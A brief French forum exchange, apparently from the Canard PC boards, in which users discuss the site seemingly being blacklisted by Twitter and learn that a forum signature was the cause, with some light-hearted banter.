Visiblement cpc est BL par twitter: http://t.co/tlANSX1b . Ou alors c'est que les vieux lien ?

----------


## O.Boulon

Yep t'avais raison Deblazkez. C'était ma signature...

----------


## Deblazkez

> Yep t'avais raison Deblazkez. C'était ma signature...



Erf, une fois le message envoyé j'avais plus eu aucun problème et comme il n'y avait pas de réponse ici je pensais que je m'étais gouré, donc je me suis permis d'effacer mon message, car te soupçonner pour rien je pense que c'est pas des bisous que tu m'aurais envoyé à la tronche  ::P:  

Bon bah au moins j'aurai pût faire un bon détective...pitin j'ai raté ma vocation  :^_^:

----------

